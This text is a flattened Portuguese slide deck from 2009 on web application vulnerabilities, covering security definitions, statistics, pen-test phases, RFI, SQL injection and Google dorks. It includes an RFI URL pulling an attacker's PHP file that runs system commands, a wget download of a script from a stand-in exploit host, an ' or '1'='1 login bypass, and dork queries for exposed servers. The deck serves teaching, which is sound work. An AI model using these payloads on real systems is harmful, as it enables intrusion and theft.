Segurança da Informação • Apresentação Segurança e Vulnerabilidades em Aplicações Web • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Jordan M. Bonagura [email protected] • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Definição: Segurança • Apresentação Segundo o dicionário da Wikipédia, o termo segurança significa: • Definições 1. Condição ou estado de estar seguro ou protegido. • Dados Estatísticos 2. Capacidade de manter seguro. 3. Proteção contra a fuga ou escape. • Mecanismos de Seg. 4. Profissional ou serviço responsável pela guarda e proteção de algo. • Taxonomia do Ataque 5. Confiança em si mesmo. • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Definição: Informação • Apresentação Segundo a norma ISO 27002, ”A informação é um ativo que, como qualquer outro • Definições ativo importante, é essencial para os negócios da empresa e conseqüentemente necessita ser adequadamente protegida”. • Dados Estatísticos • Mecanismos de Seg. http://www.abntcatalogo.com.br/norma.aspx?ID=1532 • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Definição: Segurança da Informação Portanto, podemos concluir que a Segurança da Informação, está relacionada com a • Apresentação • Definições proteção de um conjunto de informação, no sentido de preservar o valor que estes possuem para um indivíduo ou para uma organização. • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Propriedades da Segurança da Informação São características básicas da segurança da informação • Apresentação os atributos de Confidencialidade, Integridade e Disponibilidade, não estando está segurança restrita somente a sistemas computacionais, informações eletrônicas ou sistemas de armazenamento. Este conceito se aplica a todos os aspectos de proteção de informações e dados, incluindo os sistemas em si. • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Propriedades da Segurança da Informação • Apresentação CONFIDENCIALIDADE - propriedade que limita o acesso a informação tão somente às entidades legítimas, ou seja, àquelas autorizadas pelo proprietário da informação. • Definições INTEGRIDADE - propriedade que garante que a informação manipulada mantenha • Dados Estatísticos todas as características originais estabelecidas pelo proprietário da informação, incluindo controle de mudanças e a garantia do seu ciclo de vida. DISPONIBILIDADE - propriedade que garante que a informação esteja sempre disponível para o uso legítimo, ou seja, por aqueles utilizadores autorizados pelo proprietário da informação. • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Propriedades da Segurança da Informação O nível de segurança desejado está diretamente relacionado a uma política de segurança que é seguida pela organização, para garantir que uma vez estabelecidos os princípios, aquele nível desejado seja perseguido e mantido. PARADIGMA: • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Terminologias: Segurança VULNERABILIDADE - Fragilidade de software, hardware ou procedimento que pode fornecer a um atacante a maneira para entrar em um computador ou rede e ganhar acesso às informações do ambiente. • Apresentação • Definições • Dados Estatísticos AMEAÇA - Agente ou ação, espontâneo ou proposital, que aproveita das vulnerabilidades de um ambiente para conseguir seu intento. • Mecanismos de Seg. RISCO – Calculado considerando o nível de impacto e a probabilidade de uma ameaça • Taxonomia do Ataque ATAQUE – Incidência da ameaça sobre a vulnerabilidade. • Aplicação Web EXPLOIT – Programa capaz de explorar uma vulnerabilidade. • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Terminologias: Segurança Exemplo de vulnerabilidade: “Uso de protocolos inseguros para transmissão dos dados.” • Apresentação • Definições • Dados Estatísticos Exemplo de ameaça: “Um funcionário insatisfeito com a empresa.” • Mecanismos de Seg. Exemplo de ataque: “O usuário insatisfeito capturando o tráfego de rede.” • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Dados Estatísticos • Apresentação De acordo com a pesquisa elaborada pelo Computer Security Institute em 2008, mais de 70% dos ataques partem de utilizadores legítimos de sistemas de informação, ou • Definições seja, os famosos “Insiders”. • Dados Estatísticos Interno (70% dos ataques) Externo Funcionários Insatisfeitos; Crackers Funcionários Despreparados; Concorrentes; Espionagem Espionagem. • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web Fonte: http://www.gocsi.com/ • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Dados Estatísticos – Abril a Junho de 2009 Varreduras em redes. Incidentes em que ocorre uma tentativa de acesso • Apresentação Propagação de de Desfiguração códigos páginas ou automatizados comprometimento • Definições servidores • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Ataque bem sucedido http://www.cert.br/ http://www.honeypots-alliance.org.br/stats/ Outros tipos Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Ataque de negação de serviço • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Dados Estatísticos – 1º Semestre de 2009 • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/ • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Dados Estatísticos – 1º Semestre de 2009 • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/ Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 • Vulnerabilidades Vulnerabilidades em Aplicações Web Dados Estatísticos – 1º Semestre de 2009 • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/ Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 • Vulnerabilidades Vulnerabilidades em Aplicações Web Mecanismos de Segurança Controles Físicos - são barreiras que limitam o contato ou acesso direto a informação, ou a infra-estrutura que a suporta. • Apresentação • Definições • Dados Estatísticos Ex.: Portas; • Mecanismos de Seg. Trancas; Paredes; • Taxonomia do Ataque Blindagem; Câmeras; • Aplicação Web Guardas. • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Mecanismos de Segurança Controles Lógicos - são barreiras que impedem ou limitam (controlam), de acordo com os padrões pré estabelecidos, o acesso a informação. • Apresentação • Definições • Dados Estatísticos Ex.: Criptografia; • Mecanismos de Seg. Firewall; Anti Vírus; • Taxonomia do Ataque IDS / IPS; Anti Spam; • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Mecanismos de Segurança • Apresentação Além de dispositivos de segurança, também existem diversos serviços relacionados a segurança da informação. • Definições Ex.: • Dados Estatísticos Criação de Políticas de Segurança; Hardening de Servidores; Análise de Vulnerabilidades; Teste de Intrusão (Pen Test); Análise de Aplicações (Testes); Treinamento de Colaboradores. • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Procedimentos de um Pen Test • Apresentação Os procedimentos realizados por um profissional de Pen Test são muito similares aos procedimentos realizados pelos Crackers, porém com diferentes éticas e intenções. • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web 1. Levantamento de Informações • Apresentação Nesta fase emprega-se aproximadamente 90% do tempo gasto em uma análise • Definições de segurança (Pen Test). Nesta etapa, o principal objetivo do profissional é conseguir o maior número de informações sobre o alvo, para somente então, começar a planejar a melhor maneira de sua intrusão. • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Quanto maior o tempo empregado nesta fase, maior a probabilidade de sucesso na fase de acesso. • Aplicação Web Fonte: Certificação de Hacker Ético • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web 1. Levantamento de Informações • Apresentação Nesta fase procura-se conhecer: • Definições Informações sobre a organização ou pessoa alvo; Informações sobre os servidores da organização; Informações sobre os funcionários da organização; Informações sobre os amigos e pessoas chaves da organização; Endereços de e-mail, telefones e nº de registro (crachá); • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Sistemas e equipamentos utilizados (parcerias); Qualquer outra informação relacionada com o negócio. • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web 2. Varreduras • Apresentação Nesta etapa, o profissional se utiliza das informações descobertas na fase anterior e as usa para examinar a rede de maneira direcionada, conduzindo uma série de “buscas”, com a finalidade de obter as versões de sistemas e serviços que possam ser explorados, ou seja, que possam estar vulneráveis. • Definições • Dados Estatísticos • Mecanismos de Seg. Nesta fase procura-se conhecer: Sistemas operacionais utilizados e suas versões; • Taxonomia do Ataque Serviços utilizados e suas versões; Existência de IDS/IPS, firewalls e outros controles de segurança. • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web 3. Ganhando Acesso • Apresentação Nesta fase, é onde a invasão realmente ocorre. • Definições Através das informações obtidas nas fases anteriores, fazem possíveis a descoberta de vulnerabilidades que agora podem ser exploradas para obter acesso ao sistema. • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web 4. Mantendo Acesso e 5. Limpando Rastros • Apresentação Estas duas fases são as que basicamente diferenciam os profissionais de Pen Test dos Crackers, pois um profissional autorizado (pen test), não precisará manter • Definições acesso ao equipamento, nem mesmo efetuar a limpeza de registros, uma vez que já efetuou os serviços contratados e relatará todos os problemas diagnosticados ao seu cliente. • Dados Estatísticos • Mecanismos de Seg. Obs.: Porém, é de extrema importante que este profissional verifique tanto possibilidade de criação de um ambiente para futuros acessos. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Obtendo Informações • Apresentação Obtendo Informações do Domínio • Definições Ex.: Comando whois e/ou visita ao site http://www.registro.br Neste momento conseguimos obter quais informações?? Nome e IP dos servidores DNS; Nome do Responsável pelo domínio; Datas de alteração e criação; • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web Usuário - E-mail; CNPJ. • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Obtendo Informações • Apresentação Detecção do Sistema Operacional • Definições Ex.: Ping (ICMP) • Dados Estatísticos Cyclades - Normalmente 30 Linux - Normalmente 64 Windows - Normalmente 128 • Mecanismos de Seg. • Taxonomia do Ataque Cisco - Normalmente 255 Linux + iptables - Normalmente 255 • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Obtendo Informações • Apresentação Sites Antigos • Definições Ex.: site http://www.archive.org • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Entendo a aplicação WEB • Apresentação Aplicações web são programas que ficam em um servidor web e executam tarefas para dar uma resposta ao usuário. Webmails, web fóruns e blogs são bons exemplos de aplicações web. Uma aplicação web utiliza uma arquitetura cliente/servidor. • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Melhor exemplificando: Com um navegador web, o cliente acessa o servidor onde a aplicação(página) está • Aplicação Web armazenada (Web Server). • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Entendo a aplicação WEB • Apresentação Com a exploração de uma aplicação web é possível ganhar acesso a informações • Definições confidenciais. Aplicações web são críticas para a segurança, pois usualmente elas estão conectadas com uma base de dados que muitas vezes contém informações sigilosas do negócio ou mesmo de seus clientes (dados financeiros, senhas, etc). • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web PHP Injection • Apresentação Mais conhecida como Remote File Inclusion (RFI) ou Inclusão de arquivo remota, essa falha permite que um usuário malicioso execute o seu próprio arquivo PHP no site vulnerável. • Definições • Dados Estatísticos Estas técnicas são chamadas de Server Side Attack • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web PHP Injection – Funcionamento do PHP • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades http://www.criarweb.com/artigos/images/diagrama-php.gif Vulnerabilidades em Aplicações Web PHP Injection • Apresentação Exemplo de um arquivo (index.php) vulnerável: • Definições Dentro do arquivo index.php existe a linha: • Dados Estatísticos include($page); http://www.site.com.br/index.php?page=noticias.php • Mecanismos de Seg. Resultado: Executar o arquivo noticias.php • Taxonomia do Ataque http://www.site.com.br/index.php?page=servicos.php Resultado: Executar o arquivo servicos.php • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web PHP Injection • Apresentação (Chamada Maliciosa) http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php Resultado: Executar o arquivo.php Dessa forma o atacante consegue “inserir” (interpretar) um arquivo que ele controle, podendo usar funções maliciosas, como por exemplo a função system(), que servirá para executar os comandos que o atacante desejar no sistema vulnerável. • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web PHP Injection • Apresentação (Chamada Maliciosa) • Definições Exemplo do arquivo PHP (arquivo.php) do atacante: system($cmd); • Dados Estatísticos • Mecanismos de Seg. http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php&c • Taxonomia do Ataque md=ls Resultado: Executar o arquivo.php que listará o conteúdo do diretório onde o index.php está localizado • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web PHP Injection • Apresentação http://www.site.com.br/index.php?page=http://www.sitedoatacante/arquivo.php&c md=wget www.sitedeexploits.com/arquivo.pl /tmp/bd.pl Falhas dessa classe ocorrem simplesmente porque o programador não filtrou o conteúdo que recebe de um usuário. • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque Este então executa a chamada para funções para executar comandos no sistema, como por exemplo, a função system() do PHP. • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web SQL Injection • Apresentação SQL Injection é um vulnerabilidade que ocorre quando na programação não é realizada a filtragem de caracteres especiais enviados pelo usuário antes de fazer a requisição para o banco de dados, ou seja, desta maneira, estes caracteres serão interpretados pelo banco de dados diretamente. • Definições • Dados Estatísticos • Mecanismos de Seg. SQL Injection é a vulnerabilidade mais comum em aplicações web. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web SQL Injection – Funcionamento do SQL O SQL basicamente verifica se as querys executadas tem uma sintaxe válida e com isso retornam verdadeiro ou falso. • Apresentação • Definições • Dados Estatísticos Ex.: • Mecanismos de Seg. SELECT nome from users; • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web SQL Injection • Apresentação Analisando o trecho de código abaixo: • Definições function Login( cn ) { • Dados Estatísticos var username; var password; username = Request.form("username"); • Mecanismos de Seg. password = Request.form("password"); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "' and password • Taxonomia do Ataque = '" + password + "'"; • Aplicação Web .... • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web SQL Injection • Apresentação Analisando o trecho de código abaixo: • Definições Select * from users where username = „” + username + “‟ and password = „” + password “‟; • Dados Estatísticos Como ficaria a chamada no banco de dados se enviássemos no username e password o conteúdo: „ or „1‟=„1 ? • Mecanismos de Seg. • Taxonomia do Ataque Select * from users where username = „‟ or „1‟=„1‟ and password = „‟ or „1‟=„1‟; Como 1 é sempre igual a 1, teremos uma “verdade” e passaremos pela checagem. • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Google Hacking • Apresentação Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou melhor proteger as informações de uma empresa. As informações disponíveis nos servidores web da empresa provavelmente estarão nas bases de dados do Google. • Definições • Dados Estatísticos • Mecanismos de Seg. Um servidor mal configurado pode expor diversas informações da empresa • Taxonomia do Ataque no Google. • Aplicação Web Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google. • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Google Hacking • Apresentação Detectando sistemas que usando a porta 8080 • Definições inurl:8080 -intext:8080 • Dados Estatísticos Encontrando VNC intitle:VNC inurl:5800 intitle:VNC ou intitle:"VNC Viewer for Java“ Encontrando Apache 1.3.20: • Mecanismos de Seg. • Taxonomia do Ataque "Apache/1.3.20 server at" intitle:index.of • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web Descuido – Erros de Configuração • Apresentação Listagem de Diretórios Demonstração de campos e valores na barra de endereço Arquivos Antigos / Backup • Definições • Dados Estatísticos Extrações de Banco de Dados Usuários e Senhas Padrões Usuários e Senhas “fracas” (Brute Force) Demonstração de Versões/Sistemas que estão sendo utilizados. (Apache / FTP / • Mecanismos de Seg. • Taxonomia do Ataque Webmail) • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009 Vulnerabilidades em Aplicações Web • Apresentação • Definições • Dados Estatísticos • Mecanismos de Seg. • Taxonomia do Ataque • Aplicação Web • Vulnerabilidades Vulnerabilidades em Aplicações Web Jordan M. Bonagura Data: 12/11/2009